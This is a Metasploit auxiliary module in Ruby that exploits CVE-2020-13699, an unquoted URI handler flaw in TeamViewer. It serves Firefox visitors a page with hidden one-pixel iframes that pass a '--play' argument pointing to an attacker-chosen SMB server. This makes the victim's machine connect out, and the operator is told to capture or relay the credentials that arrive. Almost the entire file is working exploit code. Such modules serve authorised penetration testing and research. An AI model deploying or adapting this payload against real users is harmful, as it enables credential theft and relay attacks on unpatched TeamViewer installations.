TeamViewer Unquoted URI Handler SMB Redirect

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TeamViewer Unquoted URI Handler SMB Redirect',
        'Description' => %q{
          This module exploits an unquoted parameter call within the Teamviewer
          URI handler to create an SMB connection to an attacker controlled IP.
          TeamViewer < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870,
          12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3 are
          vulnerable.
          Only Firefox can be exploited by this vulnerability, as all other
          browsers encode the space after 'play' and before the SMB location,
          preventing successful exploitation.
          Teamviewer 15.4.4445, and 8.0.16642 were succssfully tested against.
        },
        'Author' => [
          'Jeffrey Hofmann <[email protected]>', # Vuln discovery, PoC, etc
          'h00die' # msf module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'https://jeffs.sh/CVEs/CVE-2020-13699.txt' ],
          [ 'CVE', '2020-13699' ],
          [ 'URL', 'https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448' ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('FILE_NAME', [false, 'Arbitrary tv file location', '\\teamviewer\\config.tvs']),
        OptString.new('SMB_SERVER', [true, 'SMB server IP address', '']),
        OptEnum.new('URI_HANDLER', [
          true, 'TeamViewer URI Handler', 'teamviewer10', [
            'teamviewer10',
            'teamviewer8', 'teamviewerapi', 'tvchat1', 'tvcontrol1', 'tvfiletransfer1', 'tvjoinv8',
            'tvpresent1', 'tvsendfile1', 'tvsqcustomer1', 'tvsqsupport1', 'tvvideocall1', 'tvvpn1'
          ]
        ])
      ]
    )
  end

  def html_content
    # For some reason, tends to work best when double iframes.  Single will pop up the 'open app' message, but tends to not connect.
    %(
    <html>
    <head></head>
    <body>
      <iframe style="height:1px;width:1px;" src="#{datastore['URI_HANDLER']}: --play \\\\#{datastore['SMB_SERVER']}#{datastore['FILE_NAME']}"></iframe>
      <iframe style="height:1px;width:1px;" src="#{datastore['URI_HANDLER']}: --play \\\\#{datastore['SMB_SERVER']}#{datastore['FILE_NAME']}"></iframe>
    </body>
    </html>
    )
  end

  def on_request_uri(cli, req)
    print_status("Request received for: #{req.uri}")

    ua = req.headers['User-Agent'].to_s

    unless ua.include?('Firefox')
      print_error('Target is not Firefox')
      return
    end

    print_status("Sending TeamViewer Link to #{ua}...")
    send_response_html(cli, html_content)
  end

  def run
    print_good("Please start an SMB capture/relay on #{datastore['SMB_SERVER']}")
    exploit
  end
end